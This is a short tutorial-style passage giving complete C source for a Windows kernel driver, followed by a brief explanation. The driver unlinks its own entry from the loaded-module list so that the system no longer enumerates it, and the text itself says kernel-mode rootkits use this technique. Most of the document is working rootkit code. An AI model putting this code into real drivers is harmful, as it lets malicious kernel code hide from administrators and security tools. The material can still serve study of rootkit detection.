#include typedef struct _LDR_DATA_TABLE_ENTRY { LIST_ENTRY InLoadOrderLinks; LIST_ENTRY InMemoryOrderLinks; LIST_ENTRY InInitializationOrderLinks; PVOID DllBase; PVOID EntryPoint; ULONG SizeOfImage; UNICODE_STRING FullDllName; UNICODE_STRING BaseDllName; ULONG Flags; USHORT LoadCount; USHORT TlsIndex; union { LIST_ENTRY HashLinks; struct { PVOID SectionPointer; ULONG CheckSum; }; }; union { ULONG TimeDateStamp; PVOID LoadedImports; }; struct _ACTIVATION_CONTEXT * EntryPointActivationContext; PVOID PatchInformation; LIST_ENTRY ForwarderLinks; LIST_ENTRY ServiceTagLinks; LIST_ENTRY StaticLinks; } LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY; NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject,PUNICODE_STRING pRegistryPath) { PLDR_DATA_TABLE_ENTRY PrevEntry,ModuleEntry,NextEntry; DbgPrint("DriverSection address: %#x",pDriverObject->DriverSection); ModuleEntry=(PLDR_DATA_TABLE_ENTRY)pDriverObject->DriverSection; PrevEntry=(PLDR_DATA_TABLE_ENTRY)ModuleEntry->InLoadOrderLinks.Blink; NextEntry=(PLDR_DATA_TABLE_ENTRY)ModuleEntry->InLoadOrderLinks.Flink; PrevEntry->InLoadOrderLinks.Flink=ModuleEntry->InLoadOrderLinks.Flink; NextEntry->InLoadOrderLinks.Blink=ModuleEntry->InLoadOrderLinks.Blink; ModuleEntry->InLoadOrderLinks.Flink=(PLIST_ENTRY)ModuleEntry; ModuleEntry->InLoadOrderLinks.Blink=(PLIST_ENTRY)ModuleEntry; DbgPrint("Hidden driver loaded at address %#x",ModuleEntry->DllBase); return STATUS_SUCCESS; } The above code unlinks the data entry of itself from the linked list of loaded drivers. When the driver is loaded, the address of it's driver object is passed to DriverEntry. The DriverSection member in the DRIVER_OBJECT structure points to the LDR_DATA_TABLE_ENTRY structure, which contains information about the loaded driver, such base address, entry point address, etc. When the system enumerates loaded drivers, the system start the enumeration from PsLoadedModuleList, which contains links to other data entries. By unlinking the the data entry of our driver from other entries, the driver will not be enumerated. The above technique is commonly used by kernel mode rootkits.